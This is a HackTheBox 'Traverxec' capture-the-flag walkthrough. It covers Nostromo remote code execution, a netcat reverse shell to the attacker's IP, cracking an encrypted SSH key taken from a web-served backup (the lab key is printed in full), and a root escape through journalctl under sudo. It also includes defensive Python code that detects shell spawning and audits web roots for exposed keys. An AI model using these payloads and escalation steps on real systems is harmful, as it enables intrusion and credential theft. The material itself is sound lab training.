HackTheBox “Traverxec” Walkthrough
Traverxec is an easy-level Linux machine on HackTheBox that requires thorough enumeration and exploitation of its web server, Nostromo. The first step was exploiting a Remote Code Execution (RCE) vulnerability with a Python script found through searchsploit. Next, I used the fact that the user serves a web home directory from the server to pivot into their private files. The final phase was escalating to root by abusing a sudo rule for journalctl.
Let’s get started! 🚀
Recon & Enumeration
Let’s run a full nmap scan for open ports and services:
Visit the target at port 80.
Since the nmap results show the target is running a Nostromo 1.9.6 web server, let’s check what searchsploit has to say about that version.
We get an exploit that matches the version exactly. Let’s download it.
Let’s run it.
Exploitation:
We start by passing the following command as the payload argument to the Python script:
nc 10.10.14.8 4343 -e /bin/bash
Before running it, let’s set up a listener.
Run the script.
Check the listener.
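From the defender's side, the exploitation step above leaves a very recognisable process-tree signature: the web server's unprivileged account (www-data) spawning a shell, and that shell running nc with -e. The following is an added example, not code from the walkthrough or from Nostromo, that runs a few detection rules over constructed exec-sensor records in a simple JSON-lines format (the field names ts, user, parent_comm, comm and argv are assumptions about the sensor; the IP and port are the ones the walkthrough used):

```python
"""Detect a web-server service account spawning a shell or nc (added example)."""
import json

# Accounts web servers commonly drop privileges to, and their binaries (assumed list)
WEB_SERVICE_USERS = {"www-data", "nginx", "apache", "httpd", "nostromo"}
WEB_SERVER_BINARIES = {"nhttpd", "nginx", "apache2", "httpd"}
SHELLS = {"sh", "bash", "dash", "zsh"}
NET_TOOLS = {"nc", "ncat", "netcat"}


def classify_exec(event):
    """Return the names of the detection rules an exec event matches."""
    argv = event.get("argv", [])
    comm = event.get("comm", "")
    user = event.get("user", "")
    parent = event.get("parent_comm", "")
    hits = []
    # nc/ncat asked to attach a program to the socket (the "-e /bin/bash" pattern)
    if comm in NET_TOOLS and "-e" in argv:
        hits.append("nc_exec_flag")
    # the web server's unprivileged account should not be running shells or nc at all
    if user in WEB_SERVICE_USERS and comm in SHELLS | NET_TOOLS:
        hits.append("web_user_spawns_shell")
    # a shell whose direct parent is the web server binary: the RCE's first hop
    if parent in WEB_SERVER_BINARIES and comm in SHELLS:
        hits.append("web_server_child_shell")
    return hits


def scan_exec_log(lines):
    """Run every JSON-lines exec record through the rules; return the alerts."""
    alerts = []
    for line in lines:
        line = line.strip()
        if not line:
            continue
        event = json.loads(line)
        rules = classify_exec(event)
        if rules:
            alerts.append({"ts": event["ts"], "user": event["user"],
                           "cmd": " ".join(event["argv"]), "rules": rules})
    return alerts


# Constructed sample records in a generic exec-sensor format (not real telemetry
# from the box; the IP/port are the ones the walkthrough used in its payload).
SAMPLE_LOG = """
{"ts": "2019-11-18T10:00:01Z", "user": "root", "parent_comm": "cron", "comm": "logrotate", "argv": ["/usr/sbin/logrotate", "/etc/logrotate.conf"]}
{"ts": "2019-11-18T10:00:07Z", "user": "david", "parent_comm": "bash", "comm": "ls", "argv": ["ls", "-la"]}
{"ts": "2019-11-18T10:00:12Z", "user": "www-data", "parent_comm": "nhttpd", "comm": "sh", "argv": ["/bin/sh"]}
{"ts": "2019-11-18T10:00:12Z", "user": "www-data", "parent_comm": "sh", "comm": "nc", "argv": ["nc", "10.10.14.8", "4343", "-e", "/bin/bash"]}
{"ts": "2019-11-18T10:00:30Z", "user": "root", "parent_comm": "sshd", "comm": "bash", "argv": ["-bash"]}
"""

if __name__ == "__main__":
    for alert in scan_exec_log(SAMPLE_LOG.splitlines()):
        print(alert["ts"], alert["user"], alert["cmd"], "->", ", ".join(alert["rules"]))
```

The two www-data records trigger, the root and david records do not. The rule that carries the most weight is the parent/child one: a web server that never runs CGI has no legitimate reason to have a shell as a direct child, so that rule fires even when the follow-on tool is something other than nc.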
Privilege Escalation:
Since we have a Nostromo web server, let’s have a look around and check its conf folder.
David’s home directory is not readable by us; nonetheless, we can cd directly into the folders referenced in the conf file above. Let’s have a look at the public_www folder.
We need to extract this backup archive, so let’s cp it to /tmp and extract it there.
Check id_rsa.
www-data@traverxec:/tmp$ cat home/david/.ssh/id_rsa
cat home/david/.ssh/id_rsa
-----BEGIN RSA PRIVATE KEY-----
Proc-Type: 4,ENCRYPTED
DEK-Info: AES-128-CBC,477EEFFBA56F9D283D349033D5D08C4F
seyeH/feG19TlUaMdvHZK/2qfy8pwwdr9sg75x4hPpJJ8YauhWorCN4LPJV+wfCG
tuiBPfZy+ZPklLkOneIggoruLkVGW4k4651pwekZnjsT8IMM3jndLNSRkjxCTX3W
KzW9VFPujSQZnHM9Jho6J8O8LTzl+s6GjPpFxjo2Ar2nPwjofdQejPBeO7kXwDFU
RJUpcsAtpHAbXaJI9LFyX8IhQ8frTOOLuBMmuSEwhz9KVjw2kiLBLyKS+sUT9/V7
HHVHW47Y/EVFgrEXKu0OP8rFtYULQ+7k7nfb7fHIgKJ/6QYZe69r0AXEOtv44zIc
Y1OMGryQp5CVztcCHLyS/9GsRB0d0TtlqY2LXk+1nuYPyyZJhyngE7bP9jsp+hec
dTRqVqTnP7zI8GyKTV+KNgA0m7UWQNS+JgqvSQ9YDjZIwFlA8jxJP9HsuWWXT0ZN
6pmYZc/rNkCEl2l/oJbaJB3jP/1GWzo/q5JXA6jjyrd9xZDN5bX2E2gzdcCPd5qO
xwzna6js2kMdCxIRNVErnvSGBIBS0s/OnXpHnJTjMrkqgrPWCeLAf0xEPTgktqi1
Q2IMJqhW9LkUs48s+z72eAhl8naEfgn+fbQm5MMZ/x6BCuxSNWAFqnuj4RALjdn6
i27gesRkxxnSMZ5DmQXMrrIBuuLJ6gHgjruaCpdh5HuEHEfUFqnbJobJA3Nev54T
fzeAtR8rVJHlCuo5jmu6hitqGsjyHFJ/hSFYtbO5CmZR0hMWl1zVQ3CbNhjeIwFA
bzgSzzJdKYbGD9tyfK3z3RckVhgVDgEMFRB5HqC+yHDyRb+U5ka3LclgT1rO+2so
uDi6fXyvABX+e4E4lwJZoBtHk/NqMvDTeb9tdNOkVbTdFc2kWtz98VF9yoN82u8I
Ak/KOnp7lzHnR07dvdD61RzHkm37rvTYrUexaHJ458dHT36rfUxafe81v6l6RM8s
9CBrEp+LKAA2JrK5P20BrqFuPfWXvFtROLYepG9eHNFeN4uMsuT/55lbfn5S41/U
rGw0txYInVmeLR0RJO37b3/haSIrycak8LZzFSPUNuwqFcbxR8QJFqqLxhaMztua
4mOqrAeGFPP8DSgY3TCloRM0Hi/MzHPUIctxHV2RbYO/6TDHfz+Z26ntXPzuAgRU
/8Gzgw56EyHDaTgNtqYadXruYJ1iNDyArEAu+KvVZhYlYjhSLFfo2yRdOuGBm9AX
JPNeaxw0DX8UwGbAQyU0k49ePBFeEgQh9NEcYegCoHluaqpafxYx2c5MpY1nRg8+
XBzbLF9pcMxZiAWrs4bWUqAodXfEU6FZv7dsatTa9lwH04aj/5qxEbJuwuAuW5Lh
hORAZvbHuIxCzneqqRjS4tNRm0kF9uI5WkfK1eLMO3gXtVffO6vDD3mcTNL1pQuf
SP0GqvQ1diBixPMx+YkiimRggUwcGnd3lRBBQ2MNwWt59Rri3Z4Ai0pfb1K7TvOM
j1aQ4bQmVX8uBoqbPvW0/oQjkbCvfR4Xv6Q+cba/FnGNZxhHR8jcH80VaNS469tt
VeYniFU/TGnRKDYLQH2x0ni1tBf0wKOLERY0CbGDcquzRoWjAmTN/PV2VbEKKD/w
-----END RSA PRIVATE KEY-----
We transfer the key file to our attack box, where we use the ssh2john tool to convert it into a format John can process. We then run John to crack the passphrase on the converted file.
We ssh into the target using the id_rsa and the passphrase we cracked, “hunter”.
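Two defensive lessons sit in the last few steps: a backup archive containing .ssh material was reachable from a web-served directory, and the key inside it was stored in the legacy PEM format (the Proc-Type/DEK-Info header), whose single-pass MD5 key derivation is exactly what lets ssh2john and John test passphrases so fast. The following is an added example, not code from the walkthrough, that audits a web-served tree for such exposures and classifies any private keys it finds; the directory layout, the file name backup.tgz and the key body are constructed, only the member path home/david/.ssh/id_rsa comes from the page:

```python
"""Audit a web-served directory for exposed backups and private keys (added example)."""
from __future__ import annotations

import io
import os
import re
import tarfile
import tempfile

# Names that have no business under a document root or a user's public_www
# (assumed pattern list; extend to taste).
SENSITIVE_NAME_RE = re.compile(
    r"(^|/)(\.ssh/.*|id_(rsa|dsa|ecdsa|ed25519)|.*\.pem|.*\.key|\.bash_history"
    r"|\.htpasswd|.*\.(tgz|tar\.gz|tar|zip|bak))$"
)
ARCHIVE_SUFFIXES = (".tgz", ".tar.gz", ".tar")


def classify_private_key(text: str) -> str:
    """Classify a private key by its on-disk encryption format.

    Legacy PEM ("Proc-Type: 4,ENCRYPTED" + "DEK-Info") derives the cipher key
    from the passphrase with a single MD5 pass, which is why ssh2john + john can
    try candidate passphrases so quickly.  Keys written in the OpenSSH format
    (ssh-keygen -o, the default in current OpenSSH) use a bcrypt KDF instead.
    """
    head = text.lstrip().splitlines()[:3]
    if not head:
        return "not-a-key"
    if "BEGIN OPENSSH PRIVATE KEY" in head[0]:
        return "openssh-format"
    if re.search(r"BEGIN (RSA|DSA|EC) PRIVATE KEY", head[0]):
        if any(line.startswith("Proc-Type: 4,ENCRYPTED") for line in head[1:]):
            return "legacy-pem-encrypted"
        return "legacy-pem-unencrypted"
    return "not-a-key"


def scan_archive(path: str) -> list[tuple[str, str | None]]:
    """Return (member, key_class) for archive members with sensitive names."""
    hits = []
    with tarfile.open(path, "r:*") as tf:
        for member in tf.getmembers():
            if not member.isfile() or not SENSITIVE_NAME_RE.search(member.name):
                continue
            data = tf.extractfile(member).read(4096)
            key_class = classify_private_key(data.decode("utf-8", "replace"))
            hits.append((member.name, key_class if key_class != "not-a-key" else None))
    return hits


def scan_public_dir(root: str) -> list[tuple[str, str]]:
    """Walk a web-served tree and return (relative path, reason) findings."""
    findings = []
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            full = os.path.join(dirpath, name)
            rel = os.path.relpath(full, root).replace(os.sep, "/")
            if SENSITIVE_NAME_RE.search(rel):
                findings.append((rel, "sensitive file name under web root"))
            if name.endswith(ARCHIVE_SUFFIXES):
                for member, key_class in scan_archive(full):
                    reason = f"archive contains {member}"
                    if key_class:
                        reason += f" ({key_class})"
                    findings.append((rel, reason))
    return findings


# Constructed stand-in for an encrypted legacy key: same header layout as the
# key recovered in the walkthrough, but the body is filler, not key material.
DEMO_LEGACY_KEY = """-----BEGIN RSA PRIVATE KEY-----
Proc-Type: 4,ENCRYPTED
DEK-Info: AES-128-CBC,00000000000000000000000000000000

Y29uc3RydWN0ZWQgZGVtbyBib2R5LCBub3QgYSByZWFsIGtleQ==
-----END RSA PRIVATE KEY-----
"""


def build_demo_tree() -> str:
    """Create a constructed public_www lookalike: a page plus a backup tarball
    holding home/david/.ssh/id_rsa (the path the walkthrough found)."""
    root = tempfile.mkdtemp(prefix="public_www_")
    with open(os.path.join(root, "index.html"), "w") as fh:
        fh.write("<html><body>hello</body></html>\n")
    key_bytes = DEMO_LEGACY_KEY.encode()
    with tarfile.open(os.path.join(root, "backup.tgz"), "w:gz") as tf:
        info = tarfile.TarInfo("home/david/.ssh/id_rsa")
        info.size = len(key_bytes)
        tf.addfile(info, io.BytesIO(key_bytes))
    return root


if __name__ == "__main__":
    for rel, reason in scan_public_dir(build_demo_tree()):
        print(f"{rel}: {reason}")
```

Run against the constructed tree it reports backup.tgz twice: once for being an archive under a web root, once for the legacy-encrypted id_rsa inside it. Point scan_public_dir at a real htdocs or public_www directory to use it as a periodic check; a key reported as legacy-pem-encrypted should be regenerated, or at least rewritten with ssh-keygen -p -o, and never left where a web server can serve it.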
Let’s have a look around David’s home folder.
Run server-stats.sh.
Contents of server-stats.sh:
david@traverxec:~$ cat /home/david/bin/server-stats.sh
#!/bin/bash
cat /home/david/bin/server-stats.head
echo "Load: `/usr/bin/uptime`"
echo " "
echo "Open nhttpd sockets: `/usr/bin/ss -H sport = 80 | /usr/bin/wc -l`"
echo "Files in the docroot: `/usr/bin/find /var/nostromo/htdocs/ | /usr/bin/wc -l`"
echo " "
echo "Last 5 journal log lines:"
/usr/bin/sudo /usr/bin/journalctl -n5 -unostromo.service | /usr/bin/cat
After reviewing ‘server-stats.sh’, it appears that the user ‘david’ can run ‘journalctl’ as root via sudo. This means I can run the following command with elevated privileges:
/usr/bin/sudo /usr/bin/journalctl -n5 -unostromo.service
As described on GTFOBins, it is possible to break out of the pager that journalctl opens by typing !/bin/bash at its prompt. Note that you should shrink the terminal window as small as possible first: with only five lines of output, the pager is only invoked when the output does not fit on the screen, and only then can you type the command.
Now, we can escape it with !/bin/bash.
Cheers.